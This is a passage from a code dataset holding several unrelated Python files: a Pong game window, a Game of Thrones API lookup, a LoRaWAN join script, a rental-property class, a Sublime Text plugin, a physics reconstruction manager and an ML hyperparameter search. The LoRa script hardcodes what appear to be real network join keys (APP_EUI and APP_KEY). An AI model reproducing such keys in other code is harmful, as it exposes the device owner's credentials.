Window(pyglet.window.Window):\n keys = None\n game = None\n \n def __init__(self, *args, **kwargs):\n\t # initialise the window and game state\n pyglet.window.Window.__init__(self, *args, **kwargs)\n self.game = game.Game(boolMultiplayer=True)\n self.keys = pyglet.window.key.KeyStateHandler()\n self.push_handlers(self.keys)\n \n def moveuser(self, dx, dy):\n user = self.game.userMe\n user.move(0, dy, y_bounds=(0, settings.WINDOW_HEIGHT - user.height))\n \n def parseKeys(self):\n dy = (settings.MOVE_SPEED if self.keys[pyglet.window.key.UP] else 0) \\\n + (-settings.MOVE_SPEED if self.keys[pyglet.window.key.DOWN] else 0)\n self.moveuser(0, dy)\n \n def on_mouse_scroll(self, x, y, scrollX, scrollY):\n self.moveuser(scrollX * settings.MOVE_SPEED, scrollY * settings.MOVE_SPEED)\n \n def on_draw(self):\n self.clear()\n self.parseKeys()\n self.game.draw()\n self.game.debug_text.draw()\n self.game.ball.draw()\n self.game.score.draw()\n self.game.userLeft.draw()\n self.game.userRight.draw()\n","repo_name":"ashwin2000/Pong-game","sub_path":"src/window.py","file_name":"window.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"21517862138","text":"#!/usr/bin/python3\n\"\"\"Alta3 Research - Exploring OpenAPIs with requests\"\"\"\n# documentation for this API is at\n# https://anapioficeandfire.com/Documentation\n\nimport requests\nimport pprint\n\nAOIF_CHAR = \"https://www.anapioficeandfire.com/api/characters/\"\n\ndef main():\n ## Ask user for input\n got_charToLookup = input(\"Pick a number between 1 and 1000 to return info on a GoT character! \" )\n\n ## Send HTTPS GET to the API of ICE and Fire character resource\n gotresp = requests.get(AOIF_CHAR + got_charToLookup)\n\n ## Decode the response\n got_dj = gotresp.json()\n #pprint.pprint(got_dj)\n\n #CODE CUSTOMIZATION 01\n allegiance = (got_dj['allegiances'])\n #print(allegiance)\n #print(got_dj['allegiances'])\n print(\"Books: \" + str(got_dj['books']))\n print(\"allegiances: \" + str(allegiance))\n gothouselookup = requests.get(allegiance[0])\n print(\"gothouselookup: \" + gothouselookup.url)\n got_house = gothouselookup.json()\n print(\"house of the character: \"+got_house['name'])\n \n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"VimalaJMelan/mycode","sub_path":"iceAndFire04.py","file_name":"iceAndFire04.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11340682825","text":"from network import LoRa\nimport socket\nimport ubinascii\nimport binascii\nimport struct\nimport machine\nimport time\nimport uos\n# Initialise LoRa in LORAWAN mode.\n# Please pick the region that matches where you are using the device:\n# Asia = LoRa.AS923\n# Australia = LoRa.AU915\n# Europe = LoRa.EU868\n# United States = LoRa.US915\n#lora = LoRa(mode=LoRa.LORAWAN, region=LoRa.AU915)\n\nlora = LoRa(mode=LoRa.LORAWAN, region=LoRa.AU915, adr=True, tx_retries=0, device_class=LoRa.CLASS_A)\nAPP_EUI = '406d23713c2de17a'\nAPP_KEY = 'dae41ee5789b7cc4bdd10a0799df6a7d'\n\n# remove default channels\nfor i in range(0, 72):\n lora.remove_channel(i)\n\n# adding the Australian channels\nprint(\"add channels\")\nfor i in range(0, 7):\n lora.add_channel(i, frequency=915200000 + i * 200000, dr_min=0, dr_max=3)\nlora.add_channel(65, frequency=917500000, dr_min=4, dr_max=4)\n\n# create the OTAA authentication params\napp_eui = binascii.unhexlify(APP_EUI.replace(' ',''))\napp_key = 
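A hedged sketch of the allegiances lookup that iceAndFire04.py above is driving at (a live network call; the character id is a placeholder, and the empty-list guard avoids the IndexError a character with no allegiances would otherwise cause):

import requests

char_id = "583"  # hypothetical character id
char = requests.get("https://www.anapioficeandfire.com/api/characters/" + char_id).json()
allegiances = char["allegiances"]          # a list of house URLs, possibly empty
if allegiances:
    house = requests.get(allegiances[0]).json()
    print("house of the character: " + house["name"])
else:
    print("no allegiances recorded for this character")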
binascii.unhexlify(APP_KEY.replace(' ',''))\n\n# join a network using OTAA (Over The Air Activation)\nlora.join(activation=LoRa.OTAA, auth=(app_eui, app_key), timeout=0)\n# wait until the module has joined the network\nwhile not lora.has_joined():\n time.sleep(2.5)\n print(\"attempt...\")\n\n\n# create a LoRa socket\ns = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n\n# set the LoRaWAN data rate\ns.setsockopt(socket.SOL_LORA, socket.SO_DR, 5)\n\ncount = 0\nwhile True:\n\n    # make the socket blocking\n    # (waits for the data to be sent and for the 2 receive windows to expire)\n    s.setblocking(True)\n\n    print(lora.frequency())\n    # send some data\n\n    count += 1\n    send = str(count)\n    print(count)\n\n    s.send(send)\n\n    # make the socket non-blocking\n    # (because if there's no data received it will block forever...)\n    s.setblocking(False)\n\n    # get any data received (if any...)\n    data = s.recv(64)\n    print(data)\n\n    # wait a random amount of time\n    time.sleep(machine.rng() & 0x0F)\n","repo_name":"DimitriLeandro/SBrT2019","sub_path":"Scripts/Pycom/OTAAJeferson.py","file_name":"OTAAJeferson.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3707170478","text":"from Locador import Locador\nfrom Locatario import Locatario\nfrom Mobilia import Mobilia\n\nclass Imovel:\n    def __init__(self, codigo: int, descricao: str, valor: float, locador: Locador):\n        if isinstance(codigo, int) and isinstance(descricao, str) and isinstance(valor, float) and isinstance(locador, Locador):\n            self.__codigo = codigo\n            self.__descricao = descricao\n            self.__valor = valor\n            self.__locador = locador\n            self.__locatarios = []\n            self.__mobilias = []\n\n    @property\n    def codigo(self):\n        return self.__codigo\n\n    @codigo.setter\n    def codigo(self, codigo: int):\n        if isinstance(codigo, int):\n            self.__codigo = codigo\n\n    @property\n    def descricao(self):\n        return self.__descricao\n\n    @descricao.setter\n    def descricao(self, descricao: str):\n        if isinstance(descricao, str):\n            self.__descricao = descricao\n\n    @property\n    def locador(self):\n        return self.__locador\n\n    @locador.setter\n    def locador(self, locador: Locador):\n        if isinstance(locador, Locador):\n            self.__locador = locador\n\n    @property\n    def locatarios(self):\n        return self.__locatarios\n\n    def incluir_locatario(self, locatario: Locatario):\n        if isinstance(locatario, Locatario):\n            if locatario not in self.__locatarios:\n                self.__locatarios.append(locatario)\n\n    def excluir_locatario(self, codigo_locatario: int):\n        if isinstance(codigo_locatario, int):\n            for locatario in self.__locatarios:\n                if locatario.codigo == codigo_locatario:\n                    self.__locatarios.remove(locatario)\n\n    @property\n    def mobilias(self):\n        return self.__mobilias\n\n    def incluir_mobilia(self, codigo_mobilia: int, descricao_mobilia: str):\n        '''if isinstance(codigo_mobilia, int) and isinstance(descricao_mobilia, str):\n            cont = 0\n            tam = len(self.__mobilias)\n            soma = 0\n            while cont < tam:\n                if self.__mobilias[cont].codigo == codigo_mobilia:\n                    soma += 1\n                cont += 1\n\n            if soma == 0:\n                nova_mobilia = Mobilia(codigo=codigo_mobilia, descricao=descricao_mobilia)\n                self.__mobilias.append(nova_mobilia)'''\n\n        if isinstance(codigo_mobilia, int) and isinstance(descricao_mobilia, str):\n            valor = True\n            for mobilia in self.__mobilias:\n                if mobilia.codigo == codigo_mobilia:\n                    valor = False\n\n            if valor:\n                self.__mobilias.append(Mobilia(codigo=codigo_mobilia, descricao=descricao_mobilia))\n\n\n    def excluir_mobilia(self, 
codigo_mobilia: int):\n if isinstance(codigo_mobilia, int):\n for mobilia in self.__mobilias:\n if mobilia.codigo == codigo_mobilia:\n self.__mobilias.remove(mobilia)\n\n def find_locatario_by_codigo(self, codigo_locatario: int):\n if isinstance(codigo_locatario, int):\n for locatario in self.__locatarios:\n if locatario.codigo == codigo_locatario:\n return locatario\n\ndef main():\n daniel = Locador(4954, 'Daniel', 67999, 'floripa')\n casa = Imovel(123, 'casa grande', 2450000.00, locador=daniel)\n casa.incluir_mobilia(123, 'cama')\n casa.incluir_mobilia(234, 'cadeira')\n casa.excluir_mobilia(444)\n francesco = Locatario(222, 'Francesco', 679898)\n otavio = Locatario(111, 'Otávio', 679922)\n fimose = Locatario(555, 'Vinicius', 489333)\n casa.incluir_locatario(francesco)\n casa.incluir_locatario(otavio)\n casa.excluir_locatario(333)\n casa.excluir_locatario(222)\n casa.incluir_locatario(fimose)\n print(casa.mobilias)\n print(casa.locatarios)\n pass\n\nif __name__ == '__main__':\n main()","repo_name":"Daniel-Sottovia/INE5605","sub_path":"Exercicio4/Imovel.py","file_name":"Imovel.py","file_ext":"py","file_size_in_byte":3459,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25987937443","text":"import sublime, sublime_plugin\nimport re\nfrom itertools import chain\nfrom collections import Counter\n\ndef createFeedbackDictionary(source_lines, view, current_line_number):\n\n feedback_dictionary = {}\n current_header = \"\"\n prev_header = \"\"\n line_num = 0 # The num of the lines as we look through.\n\n for line in source_lines:\n\n line_text = view.substr(line)\n\n # See if this is a header - if so find out which\n header_match = re.match( r'^#+\\s*(.*)', line_text)\n\n if header_match:\n prev_header = header_match.group(1).strip()\n\n # If this is the current line - see what the previous header was \n line_num = view.rowcol(line.begin())[0] \n if line_num == current_line_number:\n current_header = prev_header\n\n # If this is a bullet point add it to the list for the header\n bullet_match = re.match( r'^\\s*-\\s+((?!@@)(?!e\\.g\\.).+)', line_text) # Ignore lines starting with @@\n if bullet_match and len(bullet_match.group(1).strip()) > 0:\n \n bullet_text = bullet_match.group(1).strip()\n\n if bullet_text.find('@@') > -1:\n bullet_text = bullet_text[:bullet_text.find('@@')]\n\n print(bullet_text.find('@@')) \n\n # Add it if it's not already there\n if prev_header not in feedback_dictionary:\n feedback_dictionary[prev_header] = []\n\n feedback_dictionary[prev_header].append(bullet_text)\n\n # If the current line of the cursor is below the last line, then we're within the last header\n if current_line_number >= line_num:\n current_header = prev_header\n\n return feedback_dictionary, current_header\n\nclass InsertfeedbackCommand(sublime_plugin.TextCommand):\n\n def run(self, edit, insert_text):\n self.view.insert(edit, self.view.sel()[0].begin(), insert_text)\n\nclass FeedwhackCommand(sublime_plugin.TextCommand):\n\n feedback_dictionary = {}\n current_feedback_list = set()\n all_feedback = [] \n\n def insert_line(self, index):\n\n if index == -1:\n return\n else:\n self.view.run_command('insertfeedback', {\"insert_text\": self.current_feedback_list[index] })\n\n def run(self, edit):\n\n source_lines = self.view.lines(sublime.Region(0, self.view.size()))\n current_line = self.view.rowcol(self.view.sel()[0].begin())[0]\n current_header = \"\"\n\n self.feedback_dictionary, current_header = createFeedbackDictionary(source_lines, 
self.view, current_line)\n \n if current_header in self.feedback_dictionary:\n # Open the quick panel to select the thing \n print(Counter(self.feedback_dictionary[current_header]).most_common())\n self.current_feedback_list = [fb for fb,count in Counter(self.feedback_dictionary[current_header]).most_common()]\n self.view.window().show_quick_panel(self.current_feedback_list, self.insert_line) \n else:\n sublime.error_message(\"You are not in a section I recognise\")\n\nclass FeedwhackallCommand(sublime_plugin.TextCommand):\n\n feedback_dictionary = {}\n current_feedback_list = set()\n all_feedback = [] \n\n def insert_line(self, index):\n\n if index == -1:\n return\n else:\n self.view.run_command('insertfeedback', {\"insert_text\": self.current_feedback_list[index] })\n\n def run(self, edit):\n\n source_lines = self.view.lines(sublime.Region(0, self.view.size()))\n current_line = self.view.rowcol(self.view.sel()[0].begin())[0]\n current_header = \"\"\n\n self.feedback_dictionary, current_header = createFeedbackDictionary(source_lines, self.view, current_line)\n\n if current_header in self.feedback_dictionary:\n # Open the quick panel to select the thing \n self.current_feedback_list = list(chain.from_iterable([ v for v in self.feedback_dictionary.values() ]))\n print(len(self.current_feedback_list))\n self.view.window().show_quick_panel(self.current_feedback_list, self.insert_line) \n else:\n sublime.error_message(\"You are not in a section\")\n\n","repo_name":"rcraggs/Feedwhack","sub_path":"feedwhack.py","file_name":"feedwhack.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6841101178","text":"#!/usr/bin/env python\n\n# Author : Y.Lemiere\n# Date : 2017/10\n# Contact : lemiere@lpccaen.in2p3.fr\n# Object : SuperNEMO Reconstruction manager\n\nfrom datetime import date, datetime\nimport time\nimport sys\nimport os\nimport subprocess\nimport ConfigParser\nimport uuid\n\n\nimport sn_simu_mgr\nimport sn_multi_launcher\n\n# # # ############# Fill DB using AMI client #########\n# # line='AddElement -project=\"supernemo\" -processingStep=\"production\" -entity=\"demo\"'\n# # line+=' -simu_id=\"'+prefix_simu_file+'_'+str(current_index)+'\"'\n# # line+=' -confidence_level=\"damned\"'\n# # line+=' -checking_status=\"unchecked\"'\n# # line+=' -event_generator=\"'+my_event+'\"'\n# # line+=' -experiment=\"'+experiment_name+'\"'\n# # line+=' -event_per_file=\"'+nb_event+'\"'\n# # line+=' -nb_of_file=\"'+nb_of_file+'\"'\n# # line+=' -output_path=\"'+CURRENT_OUTPUT_PATH+'\"'\n# # line+=' -user_comment=\"'+sn_user_comment+'\"'\n# # line+=' -vertex_generator=\"'+my_vertex+'\"'\n# # line+=' -user=\"'+USER+'\"'\n# # #line+=' -date=\"'+start_time+'\"'\n\n# # # ##########client = pyAMI.client.Client('supernemo')\n# # # ##########client.execute(line) \n\ndef prepare_files(arg0=None,arg1=None):\n\n debug = True\n function_name = \"prepare_files\"\n\n if debug:\n print (\"DEBUG : *************************************\")\n print (\"DEBUG : [%s] : Prepare files for reconstruction purpose using (%s, %s) \"%(function_name,arg0,arg1) )\n\n CURRENT_OUTPUT_PATH = arg0\n INPUT_FILE = arg1\n\n \n snemo_cfg = ConfigParser.ConfigParser()\n snemo_cfg.read('snemo.cfg')\n\n log_file_name=CURRENT_OUTPUT_PATH+snemo_cfg.get('PRODUCTION_CFG','sys_rel_path')+snemo_cfg.get('PRODUCTION_CFG','log_rel_path')+\"/\"+\"main.log\"\n log_file = open(log_file_name,\"a\")\n\n log_db_filename = 
CURRENT_OUTPUT_PATH+snemo_cfg.get('PRODUCTION_CFG','sys_rel_path')+snemo_cfg.get('PRODUCTION_CFG','log_rel_path')+\"/\"+snemo_cfg.get('DB_CFG','log_db')\n log_db = open(log_db_filename,'a')\n log_db.write('reconstruction_version=\"%s\"\\n'%(snemo_cfg.get('RECO_CFG','reconstruction_conf')))\n log_db.close()\n\n\n try:\n os.system(\"cp %s %s\"%(snemo_cfg.get('RECO_CFG','reconstruction_conf'),CURRENT_OUTPUT_PATH+snemo_cfg.get('PRODUCTION_CFG','config_rel_path')+snemo_cfg.get('PRODUCTION_CFG','conf_rel_path')+\"/.\")) \n except:\n print(\"\\033[91mERROR\\033[00m : [%s] : Can not copy reconstruction config file\"%function_name)\n log_file.write(\"\\033[91mERROR\\033[00m: [%s] : Can not copy reconstruction config file\"%function_name)\n sys.exit(1)\n \n try:\n sn_multi_launcher.prepare_reco_launcher(CURRENT_OUTPUT_PATH,INPUT_FILE)\n except:\n print(\"\\033[91mERROR\\033[00m : [%s] : Can not launch properly sn_multi_launcher.py\"%function_name)\n log_file.write(\"\\033[91mERROR\\033[00m: [%s] : Can not launch properly sn_multi_launcher.py\"%function_name)\n sys.exit(1)\n # #end f bunch\n \n if debug:\n print(\"DEBUG : [%s] : shell script production done !\"%function_name )\n print(\"DEBUG : *************************************\")\n \n\n\n\n \n \n","repo_name":"lemiere/sn-flash","sub_path":"sn_reco_mgr.py","file_name":"sn_reco_mgr.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9399355654","text":"import os, sys\nsys.path.append('../ml_for_opvs')\nfrom ML_models.sklearn.tokenizer import Tokenizer\n\nimport pickle\nimport ast\nimport time\nimport copy\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom argparse import ArgumentParser\n\nimport optuna\nfrom optuna.visualization import plot_contour, plot_param_importances\n\nfrom ngboost import NGBRegressor\nimport gpytorch\nimport torch\nfrom torch_geometric.loader import DataLoader\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_squared_error as mse\nfrom sklearn.metrics import r2_score\nfrom sklearn.preprocessing import StandardScaler, QuantileTransformer, MinMaxScaler, FunctionTransformer\n\nfrom ml_for_opvs import utils\nfrom ml_for_opvs.models import GPRegressor, GNNEmbedder, GNNPredictor\nfrom ml_for_opvs.graphs import PairDataset, pair_collate, get_graphs\n\nALL_METRICS = ['rmse', 'r', 'r2', 'spearman', 'mse', 'mae']\n\n\ndef objective(trial, x_train, y_train, x_val, y_val, x_test, y_test, model, feature, out_dir='trained_results', detail=False):\n # wrapper to optimize hyperparameters\n\n # collectors for training information\n val_metric = []\n test_metrics = {n: [] for n in ALL_METRICS}\n results = {'y_pred': [], 'y_true': [], 'split': []}\n \n # optimize depending on model\n if model == 'ngboost':\n hp = {\n 'max_depth': trial.suggest_int('max_depth', 3, 7),\n 'min_samples_leaf': trial.suggest_int('min_samples_leaf', 1, 6),\n 'min_samples_split': trial.suggest_int('min_samples_split', 2, 6),\n 'n_estimators': trial.suggest_int('n_estimators', 1000, 2000, step=50)\n }\n\n # train return loss (minimize)\n m = NGBRegressor(\n Base = DecisionTreeRegressor(\n criterion='friedman_mse', \n max_depth=hp['max_depth'],\n min_samples_leaf=hp['min_samples_leaf'],\n min_samples_split=hp['min_samples_split']\n ), \n n_estimators=hp['n_estimators'],\n verbose=False,\n )\n m.fit(x_train, y_train.ravel(), x_val, y_val.ravel(), 
early_stopping_rounds=50)\n y_pred = m.predict(x_val)\n val_metric.append(mse(y_pred, y_val.ravel()))\n\n if detail:\n y_pred = m.predict(x_test)\n results['y_pred'].extend(y_pred.ravel().tolist())\n results['y_true'].extend(y_test.ravel().tolist())\n results['split'].extend([i]*len(y_test))\n for metric in test_metrics.keys():\n test_metrics[metric].append(utils.calculate_metric(metric, y_pred, y_test))\n\n\n # elif model == 'gp':\n # # use tanimoto if bit fingerprints\n # hp = {\n # # 'kernel': trial.suggest_categorical('kernel', ['tanimoto', 'rbf', 'matern']),\n # 'kernel': 'tanimoto' if feature == 'fp' else trial.suggest_categorical('kernel', ['rbf', 'matern']), \n # # 'lr': trial.suggest_float('lr', 1e-3, 1e-1, log=True)\n # 'lr': 0.05\n # }\n # n_epoch = 1000\n\n # # set priors\n # if hp['kernel'] == 'rbf':\n # hp.update({'lengthscale': trial.suggest_float('lengthscale', 0.05, 3.0)})\n # elif hp['kernel'] == 'cosine':\n # hp.update({'period_length': trial.suggest_float('period_length', 0.1, 3.0)})\n # elif hp['kernel'] == 'matern':\n # hp.update({\n # 'nu': trial.suggest_categorical('nu', [0.5, 1.5, 2.5]),\n # 'lengthscale': trial.suggest_float('lengthscale', 0.05, 3.0)\n # })\n # elif hp['kernel'] == 'rff':\n # hp.update({'num_samples': trial.suggest_int('num_samples', 10, 100, step=5)})\n\n # for i, tr_, va_, te_ in zip(range(len(train)), train, val, test):\n # # fit the scaler on training set only\n # x_train, y_train = x[tr_].astype(float), y[tr_].astype(float)\n # x_scaler = QuantileTransformer(n_quantiles=int(x_train.shape[0]/2.0)) if feature == 'mordred' else FunctionTransformer()\n # y_scaler = StandardScaler()\n\n # # transform the sets\n # x_train = torch.tensor(x_scaler.fit_transform(x_train))\n # y_train = torch.tensor(y_scaler.fit_transform(y_train))\n # x_val = torch.tensor(x_scaler.transform(x[va_].astype(float)))\n # y_val = torch.tensor(y_scaler.transform(y[va_].astype(float)))\n # x_test = torch.tensor(x_scaler.transform(x[te_].astype(float)))\n # y_test = torch.tensor(y_scaler.transform(y[te_].astype(float)))\n\n # # train return loss (minimize)\n # ll = gpytorch.likelihoods.GaussianLikelihood()\n # m = GPRegressor(x_train, y_train.ravel(), ll, **hp)\n # optimizer = torch.optim.Adam(m.parameters(), lr=hp['lr'])\n # mll = gpytorch.mlls.ExactMarginalLogLikelihood(ll, m)\n\n # m.train()\n # ll.train()\n # for _ in range(n_epoch):\n # optimizer.zero_grad()\n # y_pred = m(x_train)\n # loss = -mll(y_pred, y_train.ravel())\n # loss.backward()\n # optimizer.step()\n # # print(loss.item())\n\n # m.eval()\n # ll.eval()\n # with torch.no_grad():\n # y_pred = ll(m(x_val)).mean.numpy()\n # loss = mse(y_pred, y_val.numpy().ravel()) \n # # rscore = utils.r_score(y_pred.mean.numpy(), y_val.numpy().ravel())\n # val_metric.append(loss)\n\n # if detail:\n # y_test = y_test.numpy()\n # y_pred = y_scaler.inverse_transform(ll(m(x_test)).mean.numpy().reshape(y_test.shape))\n # y_test = y_scaler.inverse_transform(y_test)\n # results['y_pred'].extend(y_pred.ravel().tolist())\n # results['y_true'].extend(y_test.ravel().tolist())\n # results['split'].extend([i]*len(y_test))\n # for metric in test_metrics.keys():\n # test_metrics[metric].append(utils.calculate_metric(metric, y_pred, y_test))\n\n # elif model == 'gnn':\n # hp = {\n # 'latent_dim': trial.suggest_int('latent_dim', 10, 30),\n # 'embed_dim': trial.suggest_int('embed_dim', 10, 100), \n # # 'batch_size': 64,\n # # 'batch_size': trial.suggest_int('batch_size', 5, 7), # exponent of 2\n # # 'lr': trial.suggest_float('lr', 1e-4, 1e-2, 
log=True)\n # 'lr': 5e-3\n # }\n # batch_size = 100 # hp['batch_size']\n\n # # model settings\n # n_epoch = 1000\n # patience = 70\n # num_node_features = x[0][0].x.shape[-1]\n # num_edge_features = x[0][0].edge_attr.shape[-1]\n # output_dim = y.shape[-1]\n # # y = torch.tensor(y, dtype=torch.float)\n\n # for i, tr_, va_, te_ in zip(range(len(train)), train, val, test):\n # d_tr, a_tr = get_graphs(x, tr_)\n # d_va, a_va = get_graphs(x, va_)\n # d_te, a_te = get_graphs(x, te_)\n \n # # scale the targets\n # y_scaler = StandardScaler()\n\n # # transform the sets\n # y_train = torch.tensor(y_scaler.fit_transform(y[tr_].astype(float)), dtype=torch.float)\n # y_val = torch.tensor(y_scaler.transform(y[va_].astype(float)), dtype=torch.float)\n # y_test = torch.tensor(y_scaler.transform(y[te_].astype(float)), dtype=torch.float)\n\n # train_dl = DataLoader(PairDataset(d_tr, a_tr, y_train),\n # batch_size=batch_size, shuffle=True, collate_fn=pair_collate)\n # valid_dl = DataLoader(PairDataset(d_va, a_va, y_val),\n # batch_size=batch_size, shuffle=False, collate_fn=pair_collate)\n\n # # make the models\n # d_gnn = GNNEmbedder(num_node_features, num_edge_features, hp['latent_dim'], hp['embed_dim'])\n # a_gnn = GNNEmbedder(num_node_features, num_edge_features, hp['latent_dim'], hp['embed_dim'])\n # net = GNNPredictor(d_gnn, a_gnn, hp['embed_dim'], output_dim)\n\n # optimizer = torch.optim.Adam(net.parameters(), lr=hp['lr'])\n # criterion = torch.nn.MSELoss()\n\n # # early stopping criteria\n # best_loss = np.inf\n # best_model = None\n # best_epoch = 0\n # count = 0 \n # for epoch in range(n_epoch):\n # # s_time = time.time()\n # epoch_loss = 0\n # net.train()\n # for d_graph, a_graph, target in train_dl:\n # output = net(d_graph, a_graph)\n # loss = criterion(output, target)\n # loss.backward()\n # torch.nn.utils.clip_grad_norm_(net.parameters(), 1.0)\n # epoch_loss += loss.item()\n # optimizer.step()\n # train_avg_loss = epoch_loss / len(train_dl)\n\n # # validation\n # epoch_loss = 0\n # with torch.no_grad():\n # net.eval()\n # for d_graph, a_graph, target in valid_dl:\n # output = net(d_graph, a_graph)\n # loss = criterion(output, target)\n # epoch_loss += loss.item()\n # val_avg_loss = epoch_loss / len(valid_dl)\n\n # # check early stopping\n # if val_avg_loss < best_loss:\n # best_loss = val_avg_loss\n # best_model = copy.deepcopy(net)\n # best_epoch = epoch\n # count = 0\n # else:\n # count += 1\n \n # # print(f'Epoch {epoch:<4} Time elapsed: {time.time()-s_time}')\n\n # # trial.report(val_avg_loss, epoch)\n # # if trial.should_prune():\n # # raise optuna.exceptions.TrialPruned()\n # if count >= patience:\n # break\n\n # val_metric.append(best_loss)\n\n # if detail:\n # # also get the embeddings\n # with torch.no_grad():\n # # non shuffle the training set\n # train_dl = DataLoader(PairDataset(d_tr, a_tr, y_train),\n # batch_size=batch_size, shuffle=False, collate_fn=pair_collate)\n # test_dl = DataLoader(PairDataset(d_te, a_te, y_test),\n # batch_size=len(y_test), shuffle=False, collate_fn=pair_collate)\n\n # best_model.eval()\n # embeds = {key: {'acceptor': [], 'donor': [], 'target': []} for key in ['train', 'valid', 'test']}\n # for d_graph, a_graph, target in train_dl:\n # embeds['train']['acceptor'].append(best_model.embed_acceptor(a_graph).numpy())\n # embeds['train']['donor'].append(best_model.embed_donor(d_graph).numpy())\n # embeds['train']['target'].append(y_scaler.inverse_transform(target))\n # for d_graph, a_graph, target in valid_dl:\n # 
embeds['valid']['acceptor'].append(best_model.embed_acceptor(a_graph).numpy())\n # embeds['valid']['donor'].append(best_model.embed_donor(d_graph).numpy())\n # embeds['valid']['target'].append(y_scaler.inverse_transform(target))\n # for d_graph, a_graph, y_test in test_dl:\n # y_test = y_scaler.inverse_transform(y_test)\n # embeds['test']['acceptor'].append(best_model.embed_acceptor(a_graph).numpy())\n # embeds['test']['donor'].append(best_model.embed_donor(d_graph).numpy())\n # embeds['test']['target'].append(y_test)\n # y_pred = y_scaler.inverse_transform(best_model(d_graph, a_graph).numpy()) # not batched\n\n # # save test results\n # results['y_pred'].extend(y_pred.ravel().tolist())\n # results['y_true'].extend(y_test.ravel().tolist())\n # results['split'].extend([i]*len(y_test))\n \n # pickle.dump(embeds, open(f'{out_dir}/graphembed_split{i}.pkl', 'wb'))\n\n # for metric in test_metrics.keys():\n # test_metrics[metric].append(utils.calculate_metric(metric, y_pred, y_test))\n else:\n raise ValueError('Invalid model.')\n \n\n if not detail:\n return np.mean(val_metric)\n else:\n # pd.DataFrame(results).to_csv(f'{out_dir}/{feature}_{model}_predictions.csv', index=False)\n return pd.DataFrame(test_metrics)\n\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument(\"--model\", action=\"store\", type=str, help=\"Name of model.\")\n parser.add_argument(\"--n_trials\", action=\"store\", type=int, default=1, help=\"Number of optimization trials.\")\n parser.add_argument(\"--feature\", action=\"store\", type=str, default='fp', help=\"Name of feature.\")\n parser.add_argument(\"--dataset\", action=\"store\", type=str, default=\"min\", help=\"Dataset of choice.\")\n parser.add_argument(\"--num_workers\", action=\"store\", type=int, default=1, help=\"Number of workers, defaults to 1.\")\n\n FLAGS = parser.parse_args()\n \n # print(f'Running for {FLAGS.feature}, on {FLAGS.model}, on {FLAGS.dataset}')\n\n # read in the data\n df = pd.read_csv(f'data/{FLAGS.dataset}.csv')\n\n os.makedirs(f'trained_results/' , exist_ok=True)\n\n # if FLAGS.feature == 'mordred':\n # x_donor = utils.pca_features(x_donor)\n # x_acceptor = utils.pca_features(x_acceptor)\n\n if FLAGS.feature in ['mordred', 'fp', 'pca_mordred']:\n # remove zero variance and concatentate if vector features\n with open(f'data/{FLAGS.dataset}_{FLAGS.feature}.pkl', 'rb') as f:\n data = pickle.load(f)\n x_donor = data['donor']\n x_acceptor = data['acceptor']\n x = np.concatenate((x_donor, x_acceptor), axis=-1)\n \n elif FLAGS.feature == 'selfies':\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/smiles/master_smiles.csv')\n tk = Tokenizer()\n token2idx, max_len = tk.tokenize_selfies(f_df['DA_SELFIES'])\n x = f_df['DA_SELFIES'].apply(lambda r: tk.tokenize_from_dict(token2idx, r)).tolist()\n x = np.array(tk.pad_input(x, max_len))\n \n elif FLAGS.feature == 'smiles':\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/smiles/master_smiles.csv')\n x, max_length, vocab_length, token2idx = Tokenizer().tokenize_data(f_df['DA_SMILES'])\n x = np.array(x)\n \n elif FLAGS.feature == 'bigsmiles':\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/smiles/master_smiles.csv')\n x, max_length, vocab_length, token2idx = Tokenizer().tokenize_data(f_df['DA_BigSMILES'])\n x = np.array(x)\n \n elif FLAGS.feature == 'brics': # label encoding of brics fragments\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/BRICS/master_brics_frag.csv')\n x = 
np.array(f_df['DA_tokenized_BRICS'].apply(ast.literal_eval).tolist())\n \n elif FLAGS.feature == 'homolumo':\n f_df = pd.read_csv('../ml_for_opvs/data/input_representation/OPV_Min/smiles/master_smiles.csv')\n x = f_df[['HOMO_D_eV', 'LUMO_D_eV', 'HOMO_A_eV', 'LUMO_A_eV']].to_numpy()\n \n elif FLAGS.feature in ['graph', 'simple_graph']:\n with open(f'data/{FLAGS.dataset}_{FLAGS.feature}.pkl', 'rb') as f:\n data = pickle.load(f)\n x = [data['donor'], data['acceptor']]\n \n else:\n raise ValueError('No such feature')\n \n # get the targets\n y = df[['calc_PCE_percent']].to_numpy()\n \n if FLAGS.feature not in ['graph', 'simple_graph']:\n valid_idx = ~np.isnan(x).any(axis=1)\n x = x[valid_idx]\n y = y[valid_idx]\n\n utils.set_seed()\n if FLAGS.feature == 'graph':\n train, val, test = utils.get_cv_splits(x[0])\n else:\n train, val, test = utils.get_cv_splits(x) # 64%/16%/20% # just the indices\n \n metrics_df = []\n for i, tr_, va_, te_ in zip(range(len(train)), train, val, test):\n x_train, y_train = x[tr_], y[tr_]\n x_val, y_val = x[va_], y[va_]\n x_test, y_test = x[te_], y[te_]\n\n # perform optimization\n study = optuna.create_study(direction='minimize', study_name=f'{FLAGS.dataset}_{FLAGS.model}_{FLAGS.feature}')\n study.optimize(lambda trial: objective(trial, x_train, y_train, x_val, y_val, x_test, y_test, FLAGS.model, FLAGS.feature), \n n_trials=FLAGS.n_trials, 